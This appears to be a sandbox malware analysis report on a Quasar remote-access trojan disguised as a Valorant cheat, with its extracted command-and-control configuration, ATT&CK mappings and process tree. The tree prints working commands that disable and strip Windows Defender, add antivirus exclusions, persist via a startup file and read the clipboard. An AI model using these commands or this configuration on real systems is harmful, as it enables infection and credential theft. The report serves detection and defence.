quasar | 193d9acadf1f7cb18bd295f774c644f34da72dbc10c2eccd39c858f55f320a2f

Resubmissions

27/09/2024, 01:12

240927-bkt8wazfqa 10

27/09/2024, 01:12

240927-bkkz7szfng 10

25/09/2024, 17:23

240925-vx4smaxdmn 10

Analysis

max time kernel
27s
max time network
29s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
27/09/2024, 01:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ValoaimV8.exe
Size

20.0MB
MD5

4ed9006d9970ee5f1ee6486cfc663ee6
SHA1

258fbba6e43c23ad9680576cc51a7c0906387354
SHA256

443be4b5119ad344755137062321a4f5c249e8fb95482183c21378ba93fd96bf
SHA512

952750f7e1a1182ed69ef837b0ea053a66ef1f65d8a534a2a445a660677fc19f2eca6aa66e25e6bafedd94bbf9ccd99e3feea63b0bbd8a36d8683f67c2c63daa
SSDEEP

98304:zrcxzdbM+Q2y+aq0mGRk2jOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbQEJ1nL2hS:zrcbf0mPEOjmFQR4MVGFtwLPCnL2hVcr

Score

10^/10

quasar valorant collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Valorant

hanekese.ddns.net:1005

Mutex

QSR_MUTEX_vjIusnIFPVRxcR2xS4

Attributes

encryption_key
5V49FWeqLdk5NQWJl6h7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
mac updater
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000500000002aac8-96.dat	family_quasar
behavioral3/memory/2216-113-0x0000000000900000-0x000000000095E000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3996	powershell.exe
2392	powershell.exe
2092	powershell.exe
1408	powershell.exe
708	powershell.exe
1188	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4300	powershell.exe
4608	cmd.exe

Executes dropped EXE 4 IoCs

pid	Process
2216	bound.exe
4680	rar.exe
2920	bound.exe
4416	bound.exe

Loads dropped DLL 17 IoCs

pid	Process
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe
8	ValoaimV8.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3468	tasklist.exe
3868	tasklist.exe
1936	tasklist.exe
2060	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x000100000002ab22-22.dat	upx
behavioral3/memory/8-26-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp	upx
behavioral3/files/0x000100000002ab14-28.dat	upx
behavioral3/memory/8-30-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp	upx
behavioral3/files/0x000100000002ab1b-50.dat	upx
behavioral3/files/0x000100000002ab1a-49.dat	upx
behavioral3/files/0x000100000002ab19-48.dat	upx
behavioral3/files/0x000100000002ab18-47.dat	upx
behavioral3/files/0x000100000002ab17-46.dat	upx
behavioral3/files/0x000100000002ab16-45.dat	upx
behavioral3/files/0x000100000002ab15-44.dat	upx
behavioral3/files/0x000100000002ab13-43.dat	upx
behavioral3/files/0x000100000002ab27-42.dat	upx
behavioral3/files/0x000100000002ab26-41.dat	upx
behavioral3/files/0x000100000002ab25-40.dat	upx
behavioral3/files/0x000100000002ab21-37.dat	upx
behavioral3/files/0x000100000002ab1f-36.dat	upx
behavioral3/memory/8-33-0x00007FFA502E0000-0x00007FFA502EF000-memory.dmp	upx
behavioral3/files/0x000100000002ab20-32.dat	upx
behavioral3/memory/8-56-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp	upx
behavioral3/memory/8-58-0x00007FFA50270000-0x00007FFA50289000-memory.dmp	upx
behavioral3/memory/8-60-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp	upx
behavioral3/memory/8-62-0x00007FFA46500000-0x00007FFA46670000-memory.dmp	upx
behavioral3/memory/8-64-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp	upx
behavioral3/memory/8-66-0x00007FFA4FDE0000-0x00007FFA4FDED000-memory.dmp	upx
behavioral3/memory/8-68-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp	upx
behavioral3/memory/8-73-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp	upx
behavioral3/memory/8-76-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp	upx
behavioral3/memory/8-74-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp	upx
behavioral3/memory/8-72-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp	upx
behavioral3/memory/8-78-0x00007FFA4BA80000-0x00007FFA4BA94000-memory.dmp	upx
behavioral3/memory/8-81-0x00007FFA4ACF0000-0x00007FFA4ACFD000-memory.dmp	upx
behavioral3/memory/8-84-0x00007FFA463E0000-0x00007FFA464FC000-memory.dmp	upx
behavioral3/memory/8-80-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp	upx
behavioral3/memory/8-116-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp	upx
behavioral3/memory/8-137-0x00007FFA46500000-0x00007FFA46670000-memory.dmp	upx
behavioral3/memory/8-181-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp	upx
behavioral3/memory/8-276-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp	upx
behavioral3/memory/8-278-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp	upx
behavioral3/memory/8-279-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp	upx
behavioral3/memory/8-311-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp	upx
behavioral3/memory/8-317-0x00007FFA46500000-0x00007FFA46670000-memory.dmp	upx
behavioral3/memory/8-312-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp	upx
behavioral3/memory/8-326-0x00007FFA46670000-0x00007FFA46C59000-memory.dmp	upx
behavioral3/memory/8-351-0x00007FFA41360000-0x00007FFA416D9000-memory.dmp	upx
behavioral3/memory/8-350-0x00007FFA49B30000-0x00007FFA49BE8000-memory.dmp	upx
behavioral3/memory/8-349-0x00007FFA4AC30000-0x00007FFA4AC5E000-memory.dmp	upx
behavioral3/memory/8-348-0x00007FFA4FDE0000-0x00007FFA4FDED000-memory.dmp	upx
behavioral3/memory/8-347-0x00007FFA4BB40000-0x00007FFA4BB59000-memory.dmp	upx
behavioral3/memory/8-346-0x00007FFA46500000-0x00007FFA46670000-memory.dmp	upx
behavioral3/memory/8-345-0x00007FFA4AC60000-0x00007FFA4AC83000-memory.dmp	upx
behavioral3/memory/8-344-0x00007FFA50270000-0x00007FFA50289000-memory.dmp	upx
behavioral3/memory/8-343-0x00007FFA4AD00000-0x00007FFA4AD2D000-memory.dmp	upx
behavioral3/memory/8-342-0x00007FFA502E0000-0x00007FFA502EF000-memory.dmp	upx
behavioral3/memory/8-341-0x00007FFA502F0000-0x00007FFA50313000-memory.dmp	upx
behavioral3/memory/8-340-0x00007FFA463E0000-0x00007FFA464FC000-memory.dmp	upx
behavioral3/memory/8-339-0x00007FFA4ACF0000-0x00007FFA4ACFD000-memory.dmp	upx
behavioral3/memory/8-338-0x00007FFA4BA80000-0x00007FFA4BA94000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
224	2216	WerFault.exe	94
1240	2920	WerFault.exe	195
776	4416	WerFault.exe	202

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1480	PING.EXE
4604	PING.EXE
400	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4744	cmd.exe
3984	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1048	WMIC.exe
236	WMIC.exe
1224	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2860	systeminfo.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
400	PING.EXE
1480	PING.EXE
4604	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
708	powershell.exe
3996	powershell.exe
2392	powershell.exe
2392	powershell.exe
3996	powershell.exe
708	powershell.exe
2092	powershell.exe
2092	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
1188	powershell.exe
1188	powershell.exe
3508	powershell.exe
3508	powershell.exe
1408	powershell.exe
1408	powershell.exe
4332	powershell.exe
4332	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3468	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3068	WMIC.exe
Token: SeSecurityPrivilege	3068	WMIC.exe
Token: SeTakeOwnershipPrivilege	3068	WMIC.exe
Token: SeLoadDriverPrivilege	3068	WMIC.exe
Token: SeSystemProfilePrivilege	3068	WMIC.exe
Token: SeSystemtimePrivilege	3068	WMIC.exe
Token: SeProfSingleProcessPrivilege	3068	WMIC.exe
Token: SeIncBasePriorityPrivilege	3068	WMIC.exe
Token: SeCreatePagefilePrivilege	3068	WMIC.exe
Token: SeBackupPrivilege	3068	WMIC.exe
Token: SeRestorePrivilege	3068	WMIC.exe
Token: SeShutdownPrivilege	3068	WMIC.exe
Token: SeDebugPrivilege	3068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3068	WMIC.exe
Token: SeRemoteShutdownPrivilege	3068	WMIC.exe
Token: SeUndockPrivilege	3068	WMIC.exe
Token: SeManageVolumePrivilege	3068	WMIC.exe
Token: 33	3068	WMIC.exe
Token: 34	3068	WMIC.exe
Token: 35	3068	WMIC.exe
Token: 36	3068	WMIC.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeIncreaseQuotaPrivilege	3068	WMIC.exe
Token: SeSecurityPrivilege	3068	WMIC.exe
Token: SeTakeOwnershipPrivilege	3068	WMIC.exe
Token: SeLoadDriverPrivilege	3068	WMIC.exe
Token: SeSystemProfilePrivilege	3068	WMIC.exe
Token: SeSystemtimePrivilege	3068	WMIC.exe
Token: SeProfSingleProcessPrivilege	3068	WMIC.exe
Token: SeIncBasePriorityPrivilege	3068	WMIC.exe
Token: SeCreatePagefilePrivilege	3068	WMIC.exe
Token: SeBackupPrivilege	3068	WMIC.exe
Token: SeRestorePrivilege	3068	WMIC.exe
Token: SeShutdownPrivilege	3068	WMIC.exe
Token: SeDebugPrivilege	3068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3068	WMIC.exe
Token: SeRemoteShutdownPrivilege	3068	WMIC.exe
Token: SeUndockPrivilege	3068	WMIC.exe
Token: SeManageVolumePrivilege	3068	WMIC.exe
Token: 33	3068	WMIC.exe
Token: 34	3068	WMIC.exe
Token: 35	3068	WMIC.exe
Token: 36	3068	WMIC.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe
Token: SeSystemProfilePrivilege	1224	WMIC.exe
Token: SeSystemtimePrivilege	1224	WMIC.exe
Token: SeProfSingleProcessPrivilege	1224	WMIC.exe
Token: SeIncBasePriorityPrivilege	1224	WMIC.exe
Token: SeCreatePagefilePrivilege	1224	WMIC.exe
Token: SeBackupPrivilege	1224	WMIC.exe
Token: SeRestorePrivilege	1224	WMIC.exe
Token: SeShutdownPrivilege	1224	WMIC.exe
Token: SeDebugPrivilege	1224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1224	WMIC.exe
Token: SeRemoteShutdownPrivilege	1224	WMIC.exe
Token: SeUndockPrivilege	1224	WMIC.exe
Token: SeManageVolumePrivilege	1224	WMIC.exe
Token: 33	1224	WMIC.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2216	bound.exe
2920	bound.exe
4416	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4924 wrote to memory of 8	4924	ValoaimV8.exe	78
PID 4924 wrote to memory of 8	4924	ValoaimV8.exe	78
PID 8 wrote to memory of 4680	8	ValoaimV8.exe	79
PID 8 wrote to memory of 4680	8	ValoaimV8.exe	79
PID 8 wrote to memory of 2984	8	ValoaimV8.exe	80
PID 8 wrote to memory of 2984	8	ValoaimV8.exe	80
PID 8 wrote to memory of 224	8	ValoaimV8.exe	81
PID 8 wrote to memory of 224	8	ValoaimV8.exe	81
PID 8 wrote to memory of 1076	8	ValoaimV8.exe	82
PID 8 wrote to memory of 1076	8	ValoaimV8.exe	82
PID 8 wrote to memory of 3388	8	ValoaimV8.exe	86
PID 8 wrote to memory of 3388	8	ValoaimV8.exe	86
PID 8 wrote to memory of 3132	8	ValoaimV8.exe	89
PID 8 wrote to memory of 3132	8	ValoaimV8.exe	89
PID 2984 wrote to memory of 708	2984	cmd.exe	91
PID 2984 wrote to memory of 708	2984	cmd.exe	91
PID 3388 wrote to memory of 3468	3388	cmd.exe	92
PID 3388 wrote to memory of 3468	3388	cmd.exe	92
PID 224 wrote to memory of 3996	224	cmd.exe	93
PID 224 wrote to memory of 3996	224	cmd.exe	93
PID 3132 wrote to memory of 3068	3132	cmd.exe	95
PID 3132 wrote to memory of 3068	3132	cmd.exe	95
PID 1076 wrote to memory of 2216	1076	cmd.exe	94
PID 1076 wrote to memory of 2216	1076	cmd.exe	94
PID 1076 wrote to memory of 2216	1076	cmd.exe	94
PID 4680 wrote to memory of 2392	4680	cmd.exe	97
PID 4680 wrote to memory of 2392	4680	cmd.exe	97
PID 8 wrote to memory of 492	8	ValoaimV8.exe	98
PID 8 wrote to memory of 492	8	ValoaimV8.exe	98
PID 492 wrote to memory of 4952	492	cmd.exe	100
PID 492 wrote to memory of 4952	492	cmd.exe	100
PID 8 wrote to memory of 544	8	ValoaimV8.exe	101
PID 8 wrote to memory of 544	8	ValoaimV8.exe	101
PID 544 wrote to memory of 2624	544	cmd.exe	103
PID 544 wrote to memory of 2624	544	cmd.exe	103
PID 8 wrote to memory of 3600	8	ValoaimV8.exe	104
PID 8 wrote to memory of 3600	8	ValoaimV8.exe	104
PID 3600 wrote to memory of 1224	3600	cmd.exe	106
PID 3600 wrote to memory of 1224	3600	cmd.exe	106
PID 8 wrote to memory of 2924	8	ValoaimV8.exe	107
PID 8 wrote to memory of 2924	8	ValoaimV8.exe	107
PID 2924 wrote to memory of 1048	2924	cmd.exe	109
PID 2924 wrote to memory of 1048	2924	cmd.exe	109
PID 8 wrote to memory of 4052	8	ValoaimV8.exe	110
PID 8 wrote to memory of 4052	8	ValoaimV8.exe	110
PID 4052 wrote to memory of 2092	4052	cmd.exe	112
PID 4052 wrote to memory of 2092	4052	cmd.exe	112
PID 8 wrote to memory of 1780	8	ValoaimV8.exe	113
PID 8 wrote to memory of 1780	8	ValoaimV8.exe	113
PID 8 wrote to memory of 408	8	ValoaimV8.exe	114
PID 8 wrote to memory of 408	8	ValoaimV8.exe	114
PID 8 wrote to memory of 4076	8	ValoaimV8.exe	167
PID 8 wrote to memory of 4076	8	ValoaimV8.exe	167
PID 1780 wrote to memory of 3868	1780	cmd.exe	119
PID 1780 wrote to memory of 3868	1780	cmd.exe	119
PID 408 wrote to memory of 1936	408	cmd.exe	120
PID 408 wrote to memory of 1936	408	cmd.exe	120
PID 8 wrote to memory of 4608	8	ValoaimV8.exe	121
PID 8 wrote to memory of 4608	8	ValoaimV8.exe	121
PID 4076 wrote to memory of 4604	4076	cmd.exe	122
PID 4076 wrote to memory of 4604	4076	cmd.exe	122
PID 8 wrote to memory of 4644	8	ValoaimV8.exe	123
PID 8 wrote to memory of 4644	8	ValoaimV8.exe	123
PID 8 wrote to memory of 4156	8	ValoaimV8.exe	125

C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe
"C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe
  "C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vnm1MMzGt19Z.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3540
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3784
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bound.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\a9axGrWauPPP.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:852
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3892
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bound.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\64lqeXHaR6mo.bat" "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4572
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3140
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:400
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 2268
        9⤵
        Program crash
        
        PID:776
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 2296
        7⤵
        Program crash
        
        PID:1240
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 2032
        5⤵
        Program crash
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:492
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:408
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4076
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4300
